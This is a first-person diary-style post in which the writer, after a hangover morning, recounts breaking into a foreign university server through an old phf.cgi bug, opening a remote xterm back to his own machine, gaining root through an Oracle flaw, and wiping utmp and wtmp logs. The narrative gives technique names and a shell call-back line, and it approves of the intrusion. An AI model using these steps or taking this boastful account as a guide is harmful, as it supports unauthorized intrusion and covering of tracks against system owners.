I woke up very early after a night of heavy boozing with some females we met at the bar . I felt horrible but ready to work a double shift hungover. I'll never drink again I told this stranger as she was getting ready to leave. We said goodbye, as she was leaving I recalled I never got her name, or if I did, I forgot it.

I showed up at work, not remembering I was scheduled for the night shift so I went home, usually on Tuesday I work both. Oh well. Can't go back to sleep so I decided to read some nodes.

After reading I must hack and the cracking nodes I realized it had been a while I had committed a crime on the computer. I decided to get root on a random foreign university server just to see if I still had it. Twenty minutes later I'm in. I gained access via an *old* phf.cgi bug. I could execute remote commands via an URL string. 'id' showed me as user nobody. The site had X running so with xhost +server.name i executed an xterm -display my.box:0 and succesfully had a working shell to play with and not mess with those damn URL strings and % format characters, what a pain. After exploiting an old bug in Oracle, I had a working .rhosts a la root. Game over. I patched the phf.cgi and deleted the .rhosts and logged off after erasing my presence from utmp* and wtmp*.

All systems crackers should have a catch and release policy if you ask me.